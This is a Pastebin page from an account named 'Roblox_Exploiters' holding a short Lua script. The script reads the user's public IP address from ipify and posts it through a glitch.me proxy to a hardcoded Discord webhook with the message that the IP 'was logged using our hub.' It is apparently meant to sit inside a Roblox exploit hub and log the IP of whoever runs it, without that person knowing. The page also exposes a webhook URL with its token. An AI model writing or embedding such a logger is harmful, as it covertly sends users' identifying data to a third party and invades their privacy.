Advertisement
Roblox_Exploiters

InfHealth

Mar 4th, 2022
89
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.05 KB | None | 0 0
  1. local ip,HttpService = tostring(game:HttpGet("https://api.ipify.org", true)), game:GetService("HttpService")
  2. local function SendMessage(Webhook, Message, Botname)
  3. if not string.find(Webhook, "https://discordapp.com/api/webhooks/") then
  4. return error("Send a valid URL");
  5. end
  6. local Name;
  7. local API = "http://buritoman69.glitch.me/webhook";
  8. if (not Message or Message == "" or not Botname) then
  9. Name = "GameBot"
  10. return error("nil or empty message!")
  11. else
  12. Name = Botname;
  13. end
  14. local Body = {
  15. ['Key'] = tostring("applesaregood"),
  16. ['Message'] = tostring(Message),
  17. ['Name'] = SussyBakaLogger,
  18. ['Webhook'] = "https://discord.com/api/webhooks/949075723530928168/UZZT0w5KvZi-xsPKj2vhEmvsE0vTvpW9nqNK6xfem3GdFjafxRXvI0cVRPt5tPWS_xNb"
  19. }
  20. Body = HttpService:JSONEncode(Body);
  21. local Data = game:HttpPost(API, Body, false, "application/json")
  22. return Data or nil;
  23. end
  24. SendMessage("https://discordapp.com/api/webhooks/snip/snip","IP: "..ip.." was logged using our hub.", "IP Logger")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement